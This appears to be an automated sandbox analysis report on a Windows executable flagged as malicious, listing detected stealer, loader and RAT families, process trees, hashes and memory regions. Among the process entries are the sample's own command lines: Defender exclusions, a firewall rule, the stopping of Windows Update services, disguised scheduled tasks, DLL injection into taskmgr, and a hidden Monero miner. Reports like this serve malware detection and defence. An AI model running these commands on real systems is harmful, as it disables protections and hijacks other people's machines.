Analysis Overview
SHA256
5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f
Threat Level: Known bad
The file NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe was found to be: Known bad.
Malicious Activity Summary
SectopRAT
Glupteba payload
RedLine
Detect Mystic stealer payload
ZGRat
RedLine payload
SmokeLoader
Mystic
Glupteba
Detect ZGRat V1
SectopRAT payload
Downloads MZ/PE file
Modifies Windows Firewall
Stops running service(s)
Executes dropped EXE
Checks computer location settings
UPX packed file
Adds Run key to start application
Suspicious use of SetThreadContext
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 10:28
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 10:28
Reported
2023-11-11 10:31
Platform
win10v2004-20231020-en
Max time kernel
46s
Max time network
136s
Signatures
Detect Mystic stealer payload
Detect ZGRat V1
Glupteba
Glupteba payload
Mystic
RedLine
RedLine payload
SectopRAT
SectopRAT payload
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4C94.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DFD.exe | N/A |
UPX packed file
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1200 set thread context of 3436 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 444 set thread context of 1800 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3436 -ip 3436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 192
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "
C:\Users\Admin\AppData\Local\Temp\4C94.exe
C:\Users\Admin\AppData\Local\Temp\4C94.exe
C:\Users\Admin\AppData\Local\Temp\4DFD.exe
C:\Users\Admin\AppData\Local\Temp\4DFD.exe
C:\Users\Admin\AppData\Local\Temp\6697.exe
C:\Users\Admin\AppData\Local\Temp\6697.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\6FEF.exe
C:\Users\Admin\AppData\Local\Temp\6FEF.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc [encoded command removed]
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\29EA.exe
C:\Users\Admin\AppData\Local\Temp\29EA.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Users\Admin\AppData\Local\Temp\6D0E.exe
C:\Users\Admin\AppData\Local\Temp\6D0E.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\8DE5.exe
C:\Users\Admin\AppData\Local\Temp\8DE5.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o stratum+ssl://rx.unmineable.com:443 -u XMR:479zMaydapGMnV67s9w67R7MygH86ebCQiYFDtnpdfSwGyYbWnhGerbJCbk2i2WwZx9qCrpYQmzFTBsSsQddJRLpKhMj2AL.RIG_CPU -p Max1957 --algo rx/0 --cpu-max-threads-hint=50
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
C:\Users\Admin\AppData\Local\Temp\is64.bat
C:\Users\Admin\AppData\Local\Temp\is64.txt
C:\Users\Admin\AppData\Local\Temp\4C94.exe
| MD5 | f6079a0d6e9c3d6c80af8adb5033b007 |
| SHA1 | c111e23c945fc86bf81729112ba1c0acdab479a0 |
| SHA256 | fed9fe7c0027acbfeb05ae652b70d981ed3aabb54559eb6bfb1ba24a27e1c3a7 |
| SHA512 | 02f4609bad9babbd141e2e80e923a99b6e03969fbbf53ad1f99f1839da83076c41dd8765df081587bba466437ff64f292c672616addcae524e1e4909bc7c44bf |
C:\Users\Admin\AppData\Local\Temp\4DFD.exe
| MD5 | 0592c6d7674c77b053080c5b6e79fdcb |
| SHA1 | 693339ede19093e2b4593fda93be0b140be69141 |
| SHA256 | fe19cdb149ecd8fd116f048852dcc10e46a3521351102685ce25c61a7d962a14 |
| SHA512 | 37f2ff110b0702229b888280c8c2dff7885e6b1e583ccc47c36e74f44adfa491f70d6d6ab95d79149437d6fd9400448f1046eee3676ea98dffe99bc28e4783cb |
memory/4780-99-0x0000000000540000-0x000000000059A000-memory.dmp
memory/3512-100-0x00000000004D0000-0x00000000004EE000-memory.dmp
memory/4780-105-0x0000000000400000-0x000000000046F000-memory.dmp
memory/3512-103-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/4780-106-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/4780-107-0x0000000007640000-0x0000000007650000-memory.dmp
memory/3512-108-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/4780-109-0x0000000008100000-0x0000000008166000-memory.dmp
memory/4780-110-0x0000000008A00000-0x0000000008A76000-memory.dmp
memory/4780-111-0x0000000008AE0000-0x0000000008AFE000-memory.dmp
memory/4780-112-0x0000000008B90000-0x0000000008D52000-memory.dmp
memory/4780-113-0x0000000008D70000-0x000000000929C000-memory.dmp
memory/4780-114-0x0000000004510000-0x0000000004560000-memory.dmp
memory/4780-117-0x0000000073D70000-0x0000000074520000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6697.exe
| MD5 | 8ee1f5e881840808946acf09bbc51f0f |
| SHA1 | d127aaf7740adc4d0b6d37ced23b010f5be52cf2 |
| SHA256 | 9de93be1d9882aaf80126934531965104436a42a11b96f12cb7d0a49f219d94f |
| SHA512 | a2f18d6e848e73aa8cc3d8120bfb28704082dd9da9de16f4107282edd4c31c85cec649631dc6533be336576ed04f270760200f303a4641ba28a1ed1391e4f032 |
C:\Users\Admin\AppData\Local\Temp\6697.exe
| MD5 | 502139b2b8daa082ff8d9dfabcf5706c |
| SHA1 | 06589361c3df8f840582c1774fe44ca70b6458e1 |
| SHA256 | bd89e4e9c035ab9c2aaef40f336383057162dd9444f43f106553cb573f540496 |
| SHA512 | 54982c64437d8a9b677aa6e78d08a4cba82b3cc7e1959dc5c100249c4fc71748b691c9c7a3497eb7b27a06a1c15bede4101156da335b6f85daf00035a400cfb5 |
memory/2360-122-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/2360-123-0x0000000000820000-0x00000000014BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | bc3354a4cd405a2f2f98e8b343a7d08d |
| SHA1 | 4880d2a987354a3163461fddd2422e905976c5b2 |
| SHA256 | fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b |
| SHA512 | fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | dcbd05276d11111f2dd2a7edf52e3386 |
| SHA1 | f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec |
| SHA256 | cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4 |
| SHA512 | 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846 |
memory/4752-155-0x00000229B41C0000-0x00000229B42AE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
| MD5 | d497d6f5d3b74379d1ca2e1abde20281 |
| SHA1 | 937aac5cf9191e833724edda2742ed115a5237c7 |
| SHA256 | a1765648a41eea21fd942776cba9b50705673d8f7564ae7f8c9751eda9e2e564 |
| SHA512 | bdb28622542e3b34e40b37a189a967b6136963200fec616c6147fd36bb543b94a7d64128d5fbd65a5358b1131dc265c7cbdb1240fece3e8c09652b97c4c025a6 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | c067b4583e122ce237ff22e9c2462f87 |
| SHA1 | 8a4545391b205291f0c0ee90c504dc458732f4ed |
| SHA256 | a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e |
| SHA512 | 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3 |
C:\Users\Admin\AppData\Local\Temp\Broom.exe
| MD5 | 00e93456aa5bcf9f60f84b0c0760a212 |
| SHA1 | 6096890893116e75bd46fea0b8c3921ceb33f57d |
| SHA256 | ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504 |
| SHA512 | abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca |
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
memory/4752-171-0x00000229B5EA0000-0x00000229B5EB0000-memory.dmp
memory/4752-168-0x00007FFAD0010000-0x00007FFAD0AD1000-memory.dmp
memory/2360-173-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/2776-172-0x0000000002900000-0x0000000002901000-memory.dmp
memory/3512-177-0x0000000073D70000-0x0000000074520000-memory.dmp
memory/4752-178-0x00000229CE7A0000-0x00000229CE880000-memory.dmp
memory/4752-180-0x00000229CE880000-0x00000229CE960000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6FEF.exe
| MD5 | 73ae6c3b85c619aa3fb06de545597251 |
| SHA1 | eb1aebe3b76ca3a2b5075880a307c7da2a7d4526 |
| SHA256 | 622b9f4f5d1eb80a8d6c0384d4c2cc62db85499005cbc5efb35e0fd343db7427 |
| SHA512 | 912a6aac98a5e83d9519b9bb40efebe843d5265768a702c5523161ba2edd422d7c7d743eaac8c5ddab6719f2500a9826979baab2ed22d0bd7d6be66f56d59923 |
memory/1484-187-0x0000000000400000-0x0000000000409000-memory.dmp
memory/468-191-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/4752-192-0x00000229CEB30000-0x00000229CEBF8000-memory.dmp
memory/2776-193-0x0000000000400000-0x0000000000965000-memory.dmp
memory/3732-189-0x000002A1DC410000-0x000002A1DC510000-memory.dmp
memory/2400-194-0x00007FF70ADF0000-0x00007FF70B391000-memory.dmp
memory/1484-196-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3512-197-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/4752-195-0x00000229B5F70000-0x00000229B5FBC000-memory.dmp
memory/4752-188-0x00000229CE960000-0x00000229CEA28000-memory.dmp
memory/468-186-0x0000000002BC0000-0x0000000002FBB000-memory.dmp
memory/1184-184-0x0000000000850000-0x0000000000859000-memory.dmp
memory/468-198-0x0000000002FC0000-0x00000000038AB000-memory.dmp
memory/3732-185-0x000002A1C1F00000-0x000002A1C1FA2000-memory.dmp
memory/1184-181-0x00000000008D0000-0x00000000009D0000-memory.dmp
memory/3732-200-0x000002A1DC530000-0x000002A1DC540000-memory.dmp
memory/3732-199-0x00007FFAD0010000-0x00007FFAD0AD1000-memory.dmp
memory/3556-203-0x0000000000400000-0x00000000004AA000-memory.dmp
